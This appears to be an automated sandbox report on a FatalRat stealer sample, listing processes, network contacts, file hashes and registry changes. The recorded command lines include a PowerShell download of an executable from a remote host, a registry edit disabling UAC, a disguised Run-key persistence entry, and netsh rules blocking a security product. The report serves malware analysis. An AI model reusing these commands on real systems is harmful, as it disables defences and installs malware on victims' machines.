C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

C:\Users\Public\Videos\bin.exe

"C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp" /SL5="$7023C,46193823,827904,C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49418 tcp
US 8.8.8.8:53 www.baidu.com udp
HK 103.235.46.96:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
NL 149.154.167.92:443 tcp
NL 149.154.167.41:443 tcp
NL 149.154.167.41:80 149.154.167.41 tcp
NL 149.154.167.92:80 149.154.167.92 tcp

Files

memory/4888-11-0x0000000140000000-0x0000000140419000-memory.dmp

memory/4888-12-0x00000145A6830000-0x00000145A6C44000-memory.dmp

memory/4888-13-0x0000000140000000-0x0000000140419000-memory.dmp

memory/4888-14-0x00000145A6270000-0x00000145A6271000-memory.dmp

C:\ProgramData\20250223024745\Agghosts.exe

MD5 2a24dcd41bc3c5b5f7eceda525786578
SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

C:\Users\Public\Downloads\20250223024745\1.bat

MD5 fa42ebb1071abc0e618c296ea2cf71a6
SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

C:\ProgramData\lnk\2.lnk

MD5 b7eb81f993f4ceeb2da553567e098525
SHA1 69ad5eca3d5dfce012dbb812cb91a5491d082bcd
SHA256 351a3f0aaaef00a71797e390cee3603283d7baac8d97fd1161245e82cded294b
SHA512 047d214720203198cc7efb49a1f4771b7f27c8e1a3459ac1440ef37720b927f1e74c27ac8bd7ce7370fea28bc5a84ba499ebc5479ceb4d848186c8da60c968cf

C:\programdata\20250223024745\libcef.dll

MD5 b7f8c3416cdfd6f46c790da064f66099
SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

C:\programdata\20250223024745\Ensup.log

MD5 2fd94f6e1d71454d716a126f0d7450ac
SHA1 5d966df95c741880089e9078af921a22216516ec
SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

memory/1828-55-0x0000000001510000-0x0000000001539000-memory.dmp

memory/4888-67-0x0000000140000000-0x0000000140419000-memory.dmp

C:\Users\Public\Videos\download_and_run.bat

MD5 a90ccfd040d774b547f7d258b8e03661
SHA1 c46e353d34723f9393482974a516d51dfb52440d
SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

C:\Users\Public\Downloads\20250223024745\fhq.bat

MD5 3a7cb580bd340505f6dc5b4c829a3eca
SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qpalyu4.ec3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3640-79-0x0000017AD3730000-0x0000017AD3752000-memory.dmp

C:\Users\Public\Videos\bin.exe

MD5 06eaa3263801f4d695c3727834ffbca5
SHA1 58031db0039cf00a1fe738e55ee2fca35558c4fd
SHA256 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff
SHA512 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3

memory/4188-87-0x0000000000EF0000-0x0000000000FC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp

MD5 2e90747fe82d7271fbe97ea022fd5173
SHA1 6164bc0ec0c908e9159a0c5d558945d7974e11c1
SHA256 bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4
SHA512 d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44

memory/4188-93-0x0000000000EF0000-0x0000000000FC8000-memory.dmp

memory/3528-94-0x0000000000D20000-0x0000000001057000-memory.dmp

memory/3528-96-0x0000000000D20000-0x0000000001057000-memory.dmp

memory/3528-101-0x0000000000D20000-0x0000000001057000-memory.dmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

MD5 a7349236212b0e5cec2978f2cfa49a1a
SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

memory/3528-126-0x0000000000D20000-0x0000000001057000-memory.dmp

memory/4188-127-0x0000000000EF0000-0x0000000000FC8000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-23 12:47

Reported

2025-02-23 12:50

Platform

win7-20241023-en

Max time kernel

119s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024744\Agghosts.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024744\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024744\Agghosts.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024744\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024744\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2360 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024744\Agghosts.exe
PID 2708 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2708 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2360 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2360 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2360 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2360 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2432 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2432 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2432 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2432 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2432 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2432 wrote to memory of 544 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1440 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024744\1.bat" "

C:\programdata\20250223024744\Agghosts.exe

"C:\programdata\20250223024744\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024744\fhq.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49226 tcp
US 8.8.8.8:53 www.baidu.com udp
CN 103.235.47.188:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.23.205.233:80 www.microsoft.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE227.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarE43C.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2360-35-0x00000000042C0000-0x00000000046D9000-memory.dmp

memory/2360-36-0x0000000003EA0000-0x00000000042B4000-memory.dmp

memory/2360-37-0x00000000042C0000-0x00000000046D9000-memory.dmp

memory/2360-38-0x00000000003B0000-0x00000000003B1000-memory.dmp

C:\Users\Public\Downloads\20250223024744\1.bat

MD5 fa42ebb1071abc0e618c296ea2cf71a6
SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

C:\ProgramData\20250223024744\Agghosts.exe

MD5 2a24dcd41bc3c5b5f7eceda525786578
SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

C:\ProgramData\lnk\2.lnk

MD5 6fad1bf37c81f67455cf0a0c58a36ed0
SHA1 16c12891c7a03ecc7368e27fa66e2b9bc82358a2
SHA256 1e3dd035f7298068310ff06f8d4387cc239084a1590233fed5100663a1a70b81
SHA512 2a1cebe1f6760ca088402b4c9725f706f16cd194d332c9c36415fc726504bea253319c1a6c85f20d32f2d42e71ff057a6fcab6baccc5d5871dbc30f231dd8139

C:\programdata\20250223024744\libcef.dll

MD5 b7f8c3416cdfd6f46c790da064f66099
SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

C:\Users\Public\Videos\download_and_run.bat

MD5 a90ccfd040d774b547f7d258b8e03661
SHA1 c46e353d34723f9393482974a516d51dfb52440d
SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
